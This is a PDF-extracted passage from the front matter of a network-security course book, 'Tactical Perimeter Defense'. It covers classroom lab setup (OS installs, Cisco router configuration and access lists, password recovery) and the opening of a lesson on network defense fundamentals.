Three Cisco routers, 2500 Series preferred (used from a reseller is ne), run-
ning IOS 12.2 or greater, with IPSec/SSH support.
One Cisco console cable.
Two serial cables.
DCE to DTE, for connecting routers.
Three switches/hubs, 10/100 Mbps.
The rewall lesson will require Microsoft ISA Server 2006. This must be
downloaded as a 180-day trial from Microsoft, or full ISA Server software
must be provided for students.
During the VPN lesson, machines designated as VPN servers will require
two NICs. The NICs can be either integrated or non-integrated.
During the VPN lesson, the instructor machine will need to be running the
FTP Service. You may enable the service during your initial setup, or during
the VPN lesson, as you prefer.
For class preparation, you will need the following tools. Note, where the
tools are available as per open source licensing, they have been included on
the course CD-ROM, all other tools should be downloaded and put in the
During the lesson on VPN,
machines that are designated
as VPN servers will require
two network cards. Integrated
and/or non-integrated
network cards will work.
xxii Tactical Perimeter Defense
correct folder. All these tools should be copied to the C:\Tools or /Tools
directories on your Windows and Linux systems accordingly.
Lesson Tool Download Source
Lesson 2 WinPcap_4_0.exe SCNS Book CD
wireshark-setup-0.99.5.exe SCNS Book CD
tftp.cap SCNS Book CD
fragment.cap SCNS Book CD
ping.text SCNS Book CD
ping.cap SCNS Book CD
ftp.txt SCNS Book CD
ftp.cap SCNS Book CD
Lesson 3 puTTY.exe SCNS Book CD
ping_arp.mac.cap SCNS Book CD
rip.update.cap SCNS Book CD
ripv2withAuthentication.cap SCNS Book CD
Lesson 5 ISA Server 2006 www.microsoft.com/isaserver/prodinfo/
default.mspx
ISAScwHlpPack.exe SCNS Book CD
Lesson 6 rfc-index.wri SCNS Book CD
rfc2547.txt SCNS Book CD
rfc2979.txt SCNS Book CD
Lesson 8 Snort_2_6_1_2_Installer SCNS Book CD
Snort Rules SCNS Book CD
mysql-essential-5.0.27-win32 SCNS Book CD
adodb493a.tgz SCNS Book CD
base-1.2.7.tar.gz SCNS Book CD
Lesson 9 WildPackets_OmniPeek_Personal41 www.omnipeek.com/downloads.php
dotnetfx.exe SCNS Book CD
NetStumbler SCNS Book CD
In this course, there are several wireless components utilized. Each training
location can decide if they wish to acquire this equipment or use the content
as the learning source. The equipment used in this lesson is:
Two laptops running Windows XP.
One Linksys WPC54G NIC and associated set-up CD-ROM.
One Netgear WPN511 NIC and associates set-up CD-ROM.
One Linksys WAP54G access point and associated set-up CD-ROM.
One Netgear WPN824 access point and associated set-up CD-ROM.
Class Requirements
In order for the class to run properly, perform the procedures described below.
Before you begin actually setting up the class, here are some recommendations
for the classroom conguration and hardware preparation.
About This Course xxiii
Recommendations for hardware preparation:
The hardware requirements are listed earlier in this course. It is not advis-
able to use systems that do not meet these requirements.
It is recommended that all the computers be of the same or similar hardware
conguration.
Congure the BIOS so that the boot order is 1: DVD-ROM, 2: oppy drive
(if present), and 3: hard drive. Protect the student machines with a BIOS
password.
ClassroomConfiguration
The following graphic shows the recommended classroom conguration. Use this
gure in conjunction with the IP addressing and naming schemes described in the
following section.
Figure 0-1: Recommended classroom setup.
IP Addressing and Computer Naming Scheme
Refer to the classroom conguration for the recommended IP addressing and
computer naming schemes for this course. Use this pattern to develop the names
and addresses for all machines, as required.
The routers divide the classroom into two halves, LEFT and RIGHT, with the
CENER router controlled by the instructor. The LEFT side is congured for
subnet 172.16.0.0/16, the CENTER is congured for subnet 172.17.0.0/16, and
the RIGHT side is congured for subnet 172.18.0.0/16. Students should have the
passwords for the LEFT and RIGHT routers, as per their location in the class-
room, but do not need the password for the CENTER router.
This course uses two base operating systems, Windows Server 2003 and SuSe
Linux Enterprise Server 10. Each machine will dual-boot to these two systems,
using the name and IP addresses as per the following table.
xxiv Tactical Perimeter Defense
Part of
Classroom
Windows
Name
Linux
Name IP Address Default Gateway
LEFT WIN-L01 LIN-L01 172.16.10.1 172.16.0.1
LEFT WIN-L02 LIN-L02 172.16.10.2 172.16.0.1
LEFT WIN-L03 LIN-L03 172.16.10.3 172.16.0.1
RIGHT WIN-R01 LIN-R01 172.18.10.1 172.18.0.1
RIGHT WIN-R02 LIN-R02 172.18.10.2 172.18.0.1
RIGHT WIN-R03 LIN-R03 172.18.10.3 172.18.0.1
CENTER WIN-C01 LIN-C01 172.17.10.1 172.17.0.1
Installing Windows 2003R2
1. Turn on the computer and insert the Windows Server 2003 R2 disc 1
into the CD-ROM drive.
2. When the screen prompts to BOOT FROM CD press any key to continue
booting. (Note, your system might boot automatically.)
3. At the Windows 2003 Setup Screen, certain les will begin to load
independently.
4. At the Windows 2003 Standard Edition Setup screen, press Enter to set up
Windows Server 2003.
5. Read the Licensing Agreement, and then press F8 to accept the
agreement.
6. Windows 2003 Standard Edition Setup screen will reappear, press C to cre-
ate a partition.
7. In the Create Partition Of Size (In MB) text box type 25000 and press
Enter.
8. To set up Windows on the newly-created partition, select the new partition,
and press Enter.
9. Select Format The Partition Using The NTFS File System (default) and
press Enter. After the partition has been formatted and les copied, the
computer will reboot.
10. Windows Server 2003 will continue installation independently. You will be
able to see the approximate time it will take to complete installation on the
left side of your screen.
11. Windows Server 2003 will install devices independently. The screen may
ash, or icker, for several seconds during this process.
12. For Regional And Language Options, select your settings, and then click
Next.
13. In the Personalize Your Settings screen, in the Name text box, type TEST,
in the Organization text box, type SCP and click Next.
14. When prompted, enter the product key and click Next.
About This Course xxv
15. In the Licensing Modes screen, select the Per Device Or Per User radio
button, and then click Next.
16. In the Computer Name dialog box, type WIN-XXX (replace XXX with your
seat number, or as your instructor denes). The Administrator Password
should be left blank, then click Next.
17. If the password is left blank, a screen will appear to conrm that you wish
to leave the password blank, click Yes. (Note, the password is left blank for
running the class, you would always have a password in a production
environment.)
18. In the Date And Time Settings screen, select your time zone, set the date
and time, and click Next.
19. Windows 2003 will begin installing network congurations.
20. In the Windows Server 2003 Setup Network Settings screen, select Typical
Settings. Click Next.
21. In the Windows Server 2003 Setup Workgroup or Computer Domain screen,
select Workgroup and then click Next.
22. Windows Server 2003 will nalize installation and reboot the computer
independently.
23. After the system reboots, press Ctrl+Alt+Delete.
24. In the Log On To Windows screen, type Administrator and leave the pass-
word blank. Click OK.
25. The Personalized Setting will nalize independently.
26. When prompted, insert the Windows Server 2003 disc 2 into the
CD-ROM drive and click OK.
27. In the Windows Server 2003 R2 Setup Wizard screen, click Next when
prompted. (Note, do not check the box to create a desktop shortcut.)
28. In the Setup Summary screen, click Next to copy the les.
29. Windows Server 2003 will update your system independently.
30. In the Completing Windows Server 2003 R2 Setup screen, click Finish.
31. In the Windows Server Post-Setup Security Updates screen, click Finish.
32. When the Windows Server 2003 Post-Setup Security Updates screen appears,
click Yes to close this dialog box.
33. Ensure that the Dont Display This Page At Logon check box is not
checked.
34. Close the Manage Your Server window.
35. Choose StartControl PanelNetwork ConnectionsLocal Area
Connection.
xxvi Tactical Perimeter Defense
36. Select TCP/IP and click Properties.
37. Select the Use The Following IP Address radio button.
38. In the IP Address text box type 172.X.X.X(your instructor will inform you
what to enter in the last three octets based on your seat number). On the left
side, your IP will be 172.16.x.x and on the right side, your IP will be 172.
18.x.x.
39. In the Subnet Mask text box, type 255.255.0.0
40. In the Default Gateway text box, type 172.16.0.1 if you are on the left side
and type 172.18.0.1 if you are on the right side (if you are unsure, ask
your instructor which side you are on).
41. In the Preferred DNS Server text box, type 127.0.0.1 and click OK twice.
42. If you receive the Pop-Up Warning, click Yes.
43. Close the Local Area Connection Properties screen.
Installing Network Monitor
1. Choose StartControl PanelAdd Or Remove Programs.
2. Click the Add/Remove Windows Components button.
3. In the Windows Components Wizard window, scroll down the list and
highlight the Management And Monitoring Tools option.
4. Click the Details button.
5. Check the Network Monitor Tools check box and click OK.
6. In the Windows Components Wizard window, click Next.
7. If prompted to insert the CD, do so now and click OK. If you are not
prompted for the CD, move on to the next step.
8. Click Finish once the install has completed.
9. Close the Add Or Remove Programs window.
10. Remove the Windows 2003 Server disc from your CD-ROM drive.
Installing Additional Tools for Windows 2003Server
1. Insert the SCP Tools & Resources disc that was provided with your
book into your CD-ROM drive.
2. Open the CD to show its contents.
3. Create a folder on the Windows partition C:\Tools.
4. Copy the les on the CD to C:\Tools.
About This Course xxvii
Installing SUSE Linux Enterprise Server 10
1. The installation of SUSE LINUX ENTERPRISE 10 must be done after the
installation of Windows Server 2003.
2. Insert the SUSE Linux Enterprise Server (SLES) 10 disc into the DVD-
ROM drive.
3. Restart the computer with the SLES disc in the drive. This will begin the
installation.
4. At the initial SLES install screen, select the Installation option, and press
Enter. This step may take a few minutes while les are copied.
5. Select your language option and click Next. These steps are based on
English (US).
6. Read the License Agreement, select the Yes, I Agree To The License
Agreement radio button, and click Next.
7. Leave the radio button selected for New Installation and click Next.
8. Select your Region and Time Zone, and click Next.
9. Accept the default installation settings, and click Accept.
10. Read the prompt about formatting your partitions, then click Install.
11. While the les are loading, you can watch the progress bar on the right side
of the screen. This will note the approximate time remaining to nish the
installation. (Note: Based on your system, this make take many minutes.)
12. When the les have nished loading, your system may reboot. Remove the
disc from the DVD-ROM drive. If you do not remove the disc, the system
will re-enter install mode.
13. At the boot loader, select the SUSE Linux Enterprise Server 10 line, and
press Enter. The install process will continue.
14. Enter LIN-XXX as your Hostname. Replace XXX with your seat number
in the class. For example, LIN-L01 or LIN-R03.
15. Enter SCPXXX as your Domain Name. Replace XXX to match your seat
number in the class as in the previous step. For example, SCPL01 or
SCPR03.
16. Once the Hostname and Domain name are entered, click Next.
17. Enter QWERTY1 as the password, and conrm the password in the sec-
ond text box. Click Next.
18. The Network Conguration screen will take a moment as Linux determines
your system conguration. Once complete, click Network Interfaces to edit
the settings on your NIC.
19. To manually congure your NIC, click the Edit button.
xxviii Tactical Perimeter Defense
20. With the Address tab active, select the Static Address Setup radio button.
21. In the IP Address text box, type 172.x.x.x (your instructor will inform you
what to enter in the last three octets, it is based on your seat in the
classroom. If you are on the left side, this will be 172.16.x.x, and if you are
on the right side, this will be 172.18.x.x.)
22. Change the subnet mask to 255.255.0.0, and then click the Routing
button.
23. In the Default Gateway text box, type 172.16.0.1 if you are on the left side
of the network, and type 172.18.0.1 if you are on the right side of the
network. If you are unsure, please ask your instructor prior to entering any
DG addresses.
24. Once the Default Gateway address is entered, click OK, and then click
Next.
25. At the Network Card Conguration Overview, verify your IP Address and
Subnet Mask, and then click Next.
26. At the Network Conguration screen, click Next. Networking services will
now be installed and congured.
27. Select the No, Skip This Test radio button, and click Next.
28. Accept the default CA Management Installation Settings, and click Next.
29. Accept the default Authentication Method Of Local (/etc/passwd), and
click Next.
30. In the New Local User screen, enter the following information:
Users Full Name: SCP Test User
Username: test1
Password: 1test
Conrm Password: 1test
Click Next.
31. The system will now perform clean up of the installation. Read through the
Release Notes, and then click Next.
32. Accept the default Hardware Conguration as it is detected, and click
Next. If your system does not properly detect your hardware, you will need
to locate the correct Linux drivers for your hardware. This setup guide does
not include non-detected hardware environments.
33. The nal setup les will be congured. Once done, you will see the Installa-
tion Completed screen. Click Finish to exit the Setup and log in to Linux.
34. After the les load, you will be at the login prompt. Enter root as the
Username, and press Enter.
35. Enter QWERTY1 as the password, and press Enter. The default les will
load, and you will now be logged into SUSE Linux Enterprise 10.
About This Course xxix
Installing Additional Tools for SUSE Linux Enterprise Server 10
1. Insert the SCP Tools & Resources disc that was provided with your
book into your CD-ROM drive.
2. Open the CD to show its contents.
3. Use the Nautilus File Manager and navigate to the / directory.
4. Create a folder labeled Tools.
5. Copy the les from the CD to the /Tools folder.
Configuring Cisco Routers
Three Cisco routers are used in the classroom. The course is written based on the
Cisco 2500 series, specically the 2501, running IOS version 12.2 (with IPSec
and SSH support). These routers can be easily found by many authorized
resellers, and while they are not the most current Cisco routers, they work very
well for the purposes of this class. There is no need to purchase or use newer
routers for the classroom, but you are welcome to do so, if you so desire.
During the conguration or the CENTER router, you must enter the IP Address
for the gateway for the classroom. This is to allow Internet Access for the class-
room, and you must congure the CENTER router as per your environment, if
Internet Access is to be granted. Extensive routing congurations beyond what is
listed here is not required for the class.
The LEFT router is for one half of the class to connect through. It should
have the following conguration:
Hostname and Routername: LEFT
Access List Conguration:
Access-list 123 deny tcp any any eq 25
Access-list 123 permit ip any any
INT S0: ip access-group 123 in
The CENTER router is for the Instructor to connect to the class. It should
have the following conguration:
Hostname and Routername: CENTER
Access List Conguration:
Access-list 155 deny tcp any any eq 20
Access-list 155 deny tcp any any eq 21
Access-list 155 permit ip any any
INT S0: ip access-group 155 in
INT S1: ip access-group 155 in
The RIGHT router is for the other half of the class to connect through. It
should have the following conguration:
Hostname and Routername: RIGHT
Access List Conguration:
Access-list 145 deny tcp any any eq 25
Access-list 145 permit ip any any
INT S1: ip access-group 145 in
xxx Tactical Perimeter Defense
The detailed conguration procedures are listed here in three main categories:
Physical conguration
Router setup
Access list conguration
Physical Router Configuration
The LEFT router is to be connected to the CENTER router via a Cisco serial
cable. The RIGHT router is also to be connected to the CENTER router via a
Cisco serial cable. All Ethernet connections are to be made through standard
10/100 BaseT cables.
1. Study the class setup diagram provided in Classroom Conguration.
2. Physically connect the three routers to each other, using serial crossover
cables, so that the router designated as CENTER controls the clock rate.
To do this, connect the DCE end of the serial cable to the serial interfaces
on the CENTER router and the DTE ends to the LEFTs and RIGHTs
appropriate serial interfaces.
3. Connect the Ethernet interface on the CENTER router to the instructor
machine via a crossover Ethernet cable.
4. Connect the Ethernet interfaces on the LEFT and RIGHT routers to
their respective hubs serving their side of the classroom.
Before You Start the Router Setup
All routers should be cleared of any congs before setting up the class. If you
have a congured router but you dont know the password, perform the following
steps:
1. Console into the router.
2. Enter the sh ver command, and record the conguration register setting
(usually 0x2102).
3. Power down the router, and then power it back up.
4. After the amount of main memory is displayed, press the Break key (or
Ctrl+Break). You should see the > prompt with no router name.
5. Enter o/r 0x42 to boot from ash or o/r 0x41 to boot from the CD-ROM.
Typically, you would boot from ash if it were intact.
6. Enter i to force the router to reboot and ignore its saved cong.
About This Course xxxi
7. Answer no to all setup questions.
8. When the Router> prompt is displayed, enter enable to switch to enable
mode. The Router# prompt should now be displayed. Once you are in enable
mode, you can view and change the password, and you can erase the cong.
9. To view the password, enter show cong at the Router# prompt.
10. To change the password, from the Router# prompt:
a. Enter cong mem to copy NVRAM to mem.
b. Enter wr term
c. Enter cong term to enter cong mode. The Router(cong)# prompt is
now displayed.
d. If an enable secret password is set, enter enable secret newpassword or
if there is no enable secret password, enter enable password
newpassword where newpassword is the new password you want to use.
e. To exit cong mode press Ctrl+Z. The Router# prompt is now
displayed.
f. Enter write mem to commit the changes to mem. You should now be
able to console in and congure the router.
11. To erase the cong, from the Router# prompt:
a. Enter write erase
b. Enter cong term to enter cong mode. The Router(cong)# prompt is
now displayed.
c. Enter cong-register 0x2102 or whatever the conguration register set-
ting was when you began.
d. To exit cong mode, press Ctrl+Z. The Router# prompt is now
displayed.
e. Enter reload
f. When you are prompted to save the modied system conguration,
enter y
g. When you are prompted to proceed with the reload, enter y
Setup for CENTERRouter
The CENTER router is used by the instructor to connect to the rest of the class.
To set up the CENTER router:
1. Boot up the router and console into it. You should be prompted to enter
the initial conguration dialog. (If you are not, follow the procedures listed
previously in the Before You Start the Router Setup section.)
2. When you are prompted:
a. To enter the initial conguration dialog, enter y
b. To enter basic management setup, enter n
c. As to whether you want to see the current interface summary, press
Enter.
xxxii Tactical Perimeter Defense
d. To enter the host name for [Router], enter CENTER
e. To enter the enable secret password, enter instructor
f. To enter the enable password, enter cisco1
g. To enter the virtual terminal password, enter 2501
h. To congure SNMP network management, enter n
i. To congure LAT, enter n
j. To congure bridging, press Enter to accept the default of No.
k. To congure AppleTalk, press Enter to accept the default of No.
l. To congure DECnet, press Enter to accept the default of No.
m. To congure IP, press Enter to accept the default of Yes.
n. To congure IGRP routing, enter n
o. To congure RIP routing, enter y
p. To congure CLNS, press Enter to accept the default of No.
q. To congure IPX, press Enter to accept the default of No.
r. To congure Vines, press Enter to accept the default of No.
s. To congure XNS, press Enter to accept the default of No.
t. To congure Apollo, press Enter to accept the default of No.
u. If you are prompted to congure BRI, select switch type 0.
v. To congure the Ethernet0 interface, press Enter to accept the default
of Yes.
w. To congure IP on this interface, press Enter to accept the default of
Yes.
x. For the IP address for this interface, enter 172.17.0.1
y. For the subnet mask for this interface, press Enter to accept the default
of 255.255.0.0.
z. To congure the Serial0 interface, press Enter to accept the default of
Yes.
aa. To congure IP on this interface, press Enter to accept the default of
Yes.
ab. To congure IP unnumbered on this interface, press Enter to accept the
default of No.
ac. For the IP address for this interface, enter 192.168.20.2
ad. For the subnet mask for this interface, press Enter to accept the default
of 255.255.255.0.
ae. To congure the Serial1 interface, press Enter to accept the default of
Yes.
af. To congure IP on this interface, press Enter to accept the default of
Yes.
ag. To congure IP unnumbered on this interface, press Enter to accept the
default of No.
ah. For the IP address for this interface, enter 192.168.10.2
ai. For the subnet mask for this interface, press Enter to accept the default
of 255.255.255.0.
About This Course xxxiii
aj. If you are prompted to congure any other serial interfaces, enter n
until a conguration command script is generated, and you are
prompted to make a selection regarding the next action.
ak. To enter your selection, press Enter to accept the default of 2. You
should see a message indicating that the router is building the
conguration. When the conguration build is complete, an OK mes-
sage is displayed.
al. To press RETURN to get started, press Enter. The CENTER> prompt
should now be displayed.
3. At the CENTER> prompt, enter en to activate enable mode.
4. When you are prompted for the password, enter instructor and the CEN-
TER# prompt should now be displayed.
5. At the CENTER# prompt, enter conf t to enter cong mode. The
CENTER(cong)# prompt should now be displayed.
6. At the CENTER(cong)# prompt:
a. Enter no ip domain lookup
b. Enter int s0 and the CENTER(cong-if)# prompt should now be
displayed.
7. At the CENTER(cong-if)# prompt:
a. Enter no shut
b. Enter clo ra 4000000
c. Enter ban 10000000
d. Enter int s1
e. Enter no shut
f. Enter clo ra 4000000
g. Enter ban 10000000
h. Enter exit and the CENTER(cong)# prompt is now displayed.
8. At the CENTER(cong)# prompt:
a. Enter ip route 0.0.0.0 0.0.0.0 a.b.c.d (note you must replace a.b.c.d
with the gateway to get out of the network to the Internet).
b. Enter exit and the CENTER# prompt is now displayed.
9. At the CENTER# prompt:
a. Enter sh run and you should see a message indicating that the router is
building the conguration.
b. Enter copy ru st
10. When you are prompted for a destination lename, press Enter to accept
the default of startup-cong. You should again see a message indicating that
the router is building the conguration.
xxxiv Tactical Perimeter Defense
Setup for LEFT Router
The LEFT router is used by half of the students to connect to the rest of the
class. To set up the LEFT router:
1. Boot up the router and console into it. You should be prompted to enter
the initial conguration dialog. (If you are not, follow the procedures listed
previously in the Before You Start the Router Setup section.)
2. When you are prompted:
a. To enter the initial conguration dialog, enter y
b. To enter basic management setup, enter n
c. As to whether you want to see the current interface summary, press
Enter.
d. To enter the host name for [Router], enter LEFT
e. To enter the enable secret password, enter cisco
f. To enter the enable password, enter cisco1
g. To enter the virtual terminal password, enter 2501
h. To congure SNMP network management, enter n
i. To congure LAT, enter n
j. To congure bridging, press Enter to accept the default of No.
k. To congure AppleTalk, press Enter to accept the default of No.
l. To congure DECnet, press Enter to accept the default of No.
m. To congure IP, press Enter to accept the default of Yes.
n. To congure IGRP routing, enter n
o. To congure RIP routing, enter y
p. To congure CLNS, press Enter to accept the default of No.
q. To congure IPX, press Enter to accept the default of No.
r. To congure Vines, press Enter to accept the default of No.
s. To congure XNS, press Enter to accept the default of No.
t. To congure Apollo, press Enter to accept the default of No.
u. If you are prompted to congure BRI, select switch type 0.
v. To congure the Ethernet0 interface, press Enter to accept the default
of Yes.
w. To congure IP on this interface, press Enter to accept the default of
Yes.
x. For the IP address for this interface, enter 172.16.0.1
y. For the subnet mask for this interface, press Enter to accept the default
of 255.255.0.0.
z. To congure the Serial0 interface, press Enter to accept the default of
Yes.
aa. To congure IP on this interface, press Enter to accept the default of
Yes.
ab. To congure IP unnumbered on this interface, press Enter to accept the
default of No.
About This Course xxxv
ac. For the IP address for this interface, enter 192.168.10.1
ad. For the subnet mask for this interface, press Enter to accept the default
of 255.255.255.0.
ae. To congure the Serial1 interface, enter n
af. If you are prompted to congure any other serial interfaces, enter n
until a conguration command script is generated, and you are
prompted to make a selection regarding the next action.
ag. To enter your selection, press Enter to accept the default of 2. You
should see a message indicating that the router is building the
conguration. When the conguration build is complete, an OK mes-
sage is displayed.
ah. To press RETURN to get started, press Enter. The LEFT> prompt
should now be displayed.
3. At the LEFT> prompt, enter en to activate enable mode.
4. When you are prompted for the password, enter cisco and the LEFT#
prompt should now be displayed.
5. At the LEFT# prompt, enter conf t to enter cong mode. The
LEFT(cong)# prompt should now be displayed.
6. At the LEFT(cong)# prompt:
a. Enter no ip domain lookup
b. Enter int s0 and the LEFT(cong-if)# prompt should now be displayed.
7. At the LEFT(cong-if)# prompt:
a. Enter no shut
b. Enter ban 10000000
c. Enter exit and the LEFT(cong)# prompt is now displayed.
8. At the LEFT(cong)# prompt:
a. Enter ip route 0.0.0.0 0.0.0.0 192.168.10.2
b. Enter exit and the LEFT# prompt is now displayed.
9. At the LEFT# prompt:
a. Enter sh run and you should see a message indicating that the router is
building the conguration.
b. Enter copy ru st
10. When you are prompted for a destination lename, press Enter to accept
the default of startup-cong. You should again see a message indicating that
the router is building the conguration.
Setup for RIGHT Router
The RIGHT router is used by half of the students to connect to the rest of the
class. To set up the RIGHT router:
xxxvi Tactical Perimeter Defense
1. Boot up the router and console into it. You should be prompted to enter
the initial conguration dialog. (If you are not, follow the procedures listed
previously in the Before You Start the Router Setup section.)
2. When you are prompted:
a. To enter the initial conguration dialog, enter y
b. To enter basic management setup, enter n
c. As to whether you want to see the current interface summary, press
Enter.
d. To enter the host name for [Router], enter RIGHT
e. To enter the enable secret password, enter cisco
f. To enter the enable password, enter cisco1
g. To enter the virtual terminal password, enter 2501
h. To congure SNMP network management, enter n
i. To congure LAT, enter n
j. To congure bridging, press Enter to accept the default of No.
k. To congure AppleTalk, press Enter to accept the default of No.
l. To congure DECnet, press Enter to accept the default of No.
m. To congure IP, press Enter to accept the default of Yes.
n. To congure IGRP routing, enter n
o. To congure RIP routing, enter y
p. To congure CLNS, press Enter to accept the default of No.
q. To congure IPX, press Enter to accept the default of No.
r. To congure Vines, press Enter to accept the default of No.
s. To congure XNS, press Enter to accept the default of No.
t. To congure Apollo, press Enter to accept the default of No.
u. If you are prompted to congure BRI, select switch type 0.
v. To congure the Ethernet0 interface, press Enter to accept the default
of Yes.
w. To congure IP on this interface, press Enter to accept the default of
Yes.
x. For the IP address for this interface, enter 172.18.0.1
y. For the subnet mask for this interface, press Enter to accept the default
of 255.255.0.0.
z. To congure the Serial0 interface, enter n
aa. To congure the Serial1 interface, press Enter to accept the default of
Yes.
ab. To congure IP on this interface, press Enter to accept the default of
Yes.
ac. To congure IP unnumbered on this interface, press Enter to accept the
default of No.
ad. For the IP address for this interface, enter 192.168.20.1
ae. For the subnet mask for this interface, press Enter to accept the default
of 255.255.255.0.
About This Course xxxvii
af. If you are prompted to congure any other serial interfaces, enter n
until a conguration command script is generated, and you are
prompted to make a selection regarding the next action.
ag. To enter your selection, press Enter to accept the default of 2. You
should see a message indicating that the router is building the
conguration. When the conguration build is complete, an OK mes-
sage is displayed.
ah. To press RETURN to get started, press Enter. The RIGHT> prompt
should now be displayed.
3. At the RIGHT> prompt, enter en to activate enable mode.
4. When you are prompted for the password, enter cisco and the RIGHT#
prompt should now be displayed.
5. At the RIGHT# prompt, enter conf t to enter cong mode. The
RIGHT(cong)# prompt should now be displayed.
6. At the RIGHT(cong)# prompt:
a. Enter no ip domain lookup
b. Enter int s1 and the RIGHT(cong-if)# prompt should now be
displayed.
7. At the RIGHT(cong-if)# prompt:
a. Enter no shut
b. Enter ban 10000000
c. Enter exit and the RIGHT(cong)# prompt is now displayed.
8. At the RIGHT(cong)# prompt:
a. Enter ip route 0.0.0.0 0.0.0.0 192.168.20.2
b. Enter exit and the RIGHT# prompt is now displayed.
9. At the RIGHT# prompt:
a. Enter sh run and you should see a message indicating that the router is
building the conguration.
b. Enter copy ru st
10. When you are prompted for a destination lename, press Enter to accept
the default of startup-cong. You should again see a message indicating that
the router is building the conguration.
Configuring the Access Lists
After the initial router setup and the basic conguration have been completed on
all three routers, you need to enter the access lists for each of the routers. To do
so:
1. To complete the LEFT Router Access Lists:
xxxviii Tactical Perimeter Defense
a. At the LEFT# prompt, enter conf t to switch to cong mode. The
LEFT(cong)# prompt is now displayed.
b. At the LEFT(cong)# prompt, enter access-list 123 deny tcp any any
eq 25
c. At the LEFT(cong)# prompt, enter access-list 123 permit ip any any
d. At the LEFT(cong)# prompt, enter int S0 to congure the interface.
The LEFT(cong-if)# prompt is now displayed.
e. At the LEFT(cong-if)# prompt, enter ip access-group 123 in
f. At the LEFT(cong-if)# prompt, press Ctrl+Z to leave cong mode.
The LEFT# prompt is now displayed.
g. At the LEFT# prompt, enter copy ru st and save the conguration
changes to startup-cong.
2. To complete the RIGHT Router Access Lists:
a. At the RIGHT# prompt, enter conf t to switch to cong mode. The
RIGHT(cong)# prompt is now displayed.
b. At the RIGHT(cong)# prompt, enter access-list 145 deny tcp any any
eq 25
c. At the RIGHT(cong)# prompt, enter access-list 145 permit ip any any
d. At the RIGHT(cong)# prompt, enter int S1 to congure the interface.
The RIGHT(cong-if)# prompt is now displayed.
e. At the RIGHT(cong-if)# prompt, enter ip access-group 145 in
f. At the RIGHT(cong-if)# prompt, press Ctrl+Z to leave cong mode.
The RIGHT# prompt is now displayed.
g. At the RIGHT# prompt, enter copy ru st and save the conguration
changes to startup-cong.
3. To complete the CENTER Router Access Lists:
a. At the CENTER# prompt, enter conf t to switch to cong mode. The
CENTER(cong)# prompt is now displayed.
b. At the CENTER(cong)# prompt, enter access-list 155 deny tcp any
any eq 20
c. At the CENTER(cong)# prompt, enter access-list 155 deny tcp any
any eq 21
d. At the CENTER(cong)# prompt, enter access-list 155 permit ip any
any
e. At the CENTER(cong)# prompt, enter int S1 to congure the S1
interface. The CENTER(cong-if)# prompt is now displayed.
f. At the CENTER(cong-if)# prompt, enter ip access-group 155 in
g. At the CENTER(cong-if)# prompt, enter int S0 to congure the S0
interface.
h. At the CENTER(cong-if)# prompt, enter ip access-group 155 in
i. At the CENTER(cong-if)# prompt, press Ctrl+Z to leave cong
mode. The CENTER# prompt is now displayed.
About This Course xxxix
j. At the CENTER# prompt, enter copy ru st and save the conguration
changes to startup-cong.
4. Test the classroom setup, and troubleshoot as necessary. Once physical
connectivity issues have been sorted out, you should be able to ping from
one side of the classroom to the other. Specically, the instructor machine
should be able to ping every student machine and vice versa. Student
machines from the left side of the classroom should be able to ping student
machines on the right side of the classroom and vice versa.
List of Additional Files
Printed with each lesson is a list of les students open to complete the tasks in
that lesson. Many tasks also require additional les that students do not open, but
are needed to support the le(s) students are working with. These supporting les
are included with the student data les on the course CD-ROM or data disk. Do
not delete these les.
HOW TO USE THIS BOOK
You can use this book as a learning guide, a review tool, and a reference.
As a Learning Guide
Each lesson covers one broad topic or set of related topics. Lessons are arranged
in order of increasing prociency with Tactical Perimeter Defense; skills you
acquire in one lesson are used and developed in subsequent lessons. For this rea-
son, you should work through the lessons in sequence.
We organized each lesson into explanatory topics and step-by-step activities. Top-
ics provide the theory you need to master Tactical Perimeter Defense, activities
allow you to apply this theory to practical hands-on examples.
You get to try out each new skill on a specially prepared sample le. This saves
you typing time and allows you to concentrate on the technique at hand. Through
the use of sample les, hands-on activities, illustrations that give you feedback at
crucial steps, and supporting background information, this book provides you
with the foundation and structure to learn about Tactical Perimeter Defense
quickly and easily.
As a ReviewTool
Any method of instruction is only as effective as the time and effort you are will-
ing to invest in it. For this reason, we encourage you to spend some time
reviewing the books more challenging topics and activities.
As a Reference
You can use the Concepts sections in this book as a rst source for denitions of
terms, background information on given topics, and summaries of procedures.
xl Tactical Perimeter Defense
About This Course xli
xlii Tactical Perimeter Defense
Network Defense
Fundamentals
Overview
In this lesson, you will be introduced to the core concepts of network
security. You will examine the technologies of defending a network, and
how those technologies may be used to create a layered defense of the
network. You will also identify the foundations of network auditing.
Objectives
To dene the concepts of defending a modern complex network, you will:
1A Describe the ve keys of network security.
Given a network scenario, you will describe how the ve keys of network
security are integrated in a modern operational network.
1B Describe the concepts of defensive technologies in creating a layered
defense.
Given a network analogy of a fortied castle, you will identify the func-
tion of defensive technologies in creating a secure layered defense.
1C Describe the objectives of access control methods.
Given a network scenario, you will describe the available access control
methods and how they are implemented in the defense of the network.
1D Identify the impact of a layered defense on the performance of the
network.
Given a network where a layered defensive system has been imple-
mented, you will identify the performance impact of each layer on
accessing resources in the network.
1E Dene concepts of auditing in a network.
Given a network scenario, you will examine the concepts of network
auditing, including handling of data and types of audits.
Data Files
none
Lesson Time
2 hours
LESSON
1
Lesson 1: Network Defense Fundamentals 1
Topic 1A
Network Defense
In todays world, it is getting easier for attackers to inltrate private networks.
They have access to more tools, more powerful computers, and there are more
networks to target. Sadly, many organizations simply do not take this threat
seriously. They do not see the driving force to create a secure network. They do
not see the need to spend money on a defense for their electronic assets. But the
need is very real. Every year, the Computer Security Institute (CSI), and the Fed-
eral Bureau of Investigations (FBI), perform a survey of businesses, looking into
the nancial losses for theft of proprietary information, and other losses.
Although only a handful of companies who participate in this survey have esti-
mated their losses, the number has been in the tens to hundreds of millions of
dollars.
What makes these numbers even more serious is the fact that these are voluntary
reports, and only a small number of businesses are involved. Many organizations
are not eager, even in an anonymous setting, to disclose any losses due to com-
puter crime.
Even so, there is an obvious pattern here. The attacks against networks are get-
ting more seriouswith a greater loss to the business world than ever before.
Even as organizations start to become more security conscious, the number of
attackers grows. Clearly, defense is needed, and it is needed now.
Network systems allow the enterprise to access information technology assets by
authorized users quickly through seemingly secure methods. But as remote sites
get interconnected through the Internet using non-dedicated lines to enterprise
networks, many unauthorized users get connected and have access as well.
Users may be naive at times about network security, because the assumption is
often made that systems are needed, and are operational, to do their jobs. If they
are on, some assume, they are secure. But administrators know that security is a
real issue to address and no assumptions are going to make network security
magically happen. They know that carefully planned steps must be taken to build
a secure network system environment, where business transactions and support
